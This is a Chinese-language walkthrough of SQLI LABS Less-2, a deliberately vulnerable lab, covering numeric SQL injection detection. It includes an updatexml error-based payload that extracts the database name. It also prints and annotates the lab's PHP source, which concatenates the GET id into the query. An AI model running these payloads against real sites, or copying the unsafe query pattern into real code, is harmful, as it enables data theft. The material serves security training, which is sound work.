当前位置: 首页 > article >正文

SQLI LABS | Less-2 GET-Error based-Intiger based

关注这个靶场的其它相关笔记:SQLI LABS —— 靶场笔记合集-CSDN博客

0x01:过关流程

输入下面的链接进入靶场(如果你的地址和我不一样,按照你本地的环境来):

 http://localhost/sqli-labs/Less-2/

靶场提示 Please input the ID as parameter with numeric value 要我们输入一个数字型的 ID 作为参数进行查询,那我们就按它的意思传入 id 看看网页返回的结果:

可以看到,服务器返回了对应 id 用户的登录名与登录密码。此时,我们可以再输入几个数据进行测试:

 测试 Payload 01: ?id=1   # 结果: Your Login name:Dumb      Your Password:Dumb
 测试 Payload 02: ?id=2   # 结果: Your Login name:Angelina  Your Password:I-kill-you
 测试 Payload 03: ?id=2-1 # 结果: Your Login name:Dumb      Your Password:Dumb
 测试 Payload 04: ?id=1'  # 结果: 报错

可以看到,当我们传递 Payload 03 给服务器后端时,它爆出的结果与 Payload 01 一致,其实这时候就已经可以判断目标后端存在数字型注入了,推测目标后端 SQL 模板如下:

 select username,password from users where id=$_GET['id'] LIMIT 0,1;

在进行进一步测试时,Payload 04 返回的结果直接报错。既然服务端能显示报错信息,那么本关依旧采用报错注入,攻击 Payload 如下:

 -- 获取当前服务器正在使用的数据库的名称
 攻击 Payload: ?id=1 and updatexml(1,concat(0x7e,database(),0x7e),1)
 笔者备注: 0x7e 是字符 ~ 号,用于标识服务器报出来的数据。

可以看到,我们已经成功获取了当前站点使用的后端数据库的信息。至此,Less-2 GET-Error based-Intiger based 成功过关。

0x02:源码分析

下面是 SQLI LABS Less-2 GET-Error based-Intiger based 后端的部分源码,以及笔者做的笔记:

 <?php
 //including the Mysql connect parameters.
 include("../sql-connections/sqli-connect.php"); // 导入数据库连接文件,获取数据库连接对象
 error_reporting(0); // 设置 PHP 错误报告级别为最低,从而禁用所有错误报告
 // take the variables
 if (isset($_GET['id'])) { // 接受通过GET方式传递的 id 的值
     $id = $_GET['id'];
     //logging the connection parameters to a file for analysis.
     $fp = fopen('result.txt', 'a');
     fwrite($fp, 'ID:' . $id . "\n");
     fclose($fp);
 ​
 ​
     // connectivity 
     $sql = "SELECT * FROM users WHERE id=$id LIMIT 0,1"; // 最终执行的 SQL 语句
     $result = mysqli_query($con1, $sql);
     $row = mysqli_fetch_array($result, MYSQLI_BOTH); // 尝试从查询结果中获取数据行
 ​
     if ($row) {
         echo "<font size='5' color= '#99FF00'>";
         echo 'Your Login name:' . $row['username'];
         echo "<br>";
         echo 'Your Password:' . $row['password'];
         echo "</font>";
     } else {    // 如果没有获取到数据行,显示错误信息
         echo '<font color= "#FFFF00">';
         print_r(mysqli_error($con1)); // 自己主动回显报错信息,导致存在报错注入的可能
         echo "</font>";
     }
 } else {
     echo "Please input the ID as parameter with numeric value";
 }
 ​
 ?>

http://www.kler.cn/news/357451.html

相关文章:

  • 24算法刷题 | Day46 | 动态规划 XIII | 子序列问题 IV | LeetCode 647. 回文子串,516. 最长回文子序列
  • 面试手撕代码-二十三种设计模式之享元模式
  • 计算机组成原理(笔记7高速缓冲存储器Cache,计算机组成原理的重难点全、直接、组相连)
  • 探索 Python 中的 XML 转换利器:xml2dict
  • 量子门电路开销——T门、clifford门、toffoli门、fredkin门
  • AutoFixture:.NET 的假数据生成工具
  • 道路垃圾识别数据集 含pt模型界面 18类 共7542张图片,xml和txt标签都有;
  • 安全光幕的工作原理及应用场景
  • 域7:安全运营 第18章(DRP)和第19章 (Investigation and Ethics)
  • Java中的Math类
  • 五、事务和并发控制及索引和性能优化
  • 大幅降低人工核验遗漏的概率,降低出错风险的智慧能源开源了
  • 笔记:SOME/IP-SD报文中的TTL
  • 智能取暖桌:以九芯电子NRK3502语音识别芯片提升用户体验
  • rom定制系列------小米6x_MIUI14_安卓13刷机包修改写入以及功能定制 界面预览
  • 鸿蒙网络编程系列12-使用Request部件下载文件到本地示例
  • 【VUE】Vue中常用的修饰符
  • Rust虚拟机Demo
  • 案例分享-优秀蓝色系UI界面赏析
  • 探索C#编程基础:从输入验证到杨辉三角的生成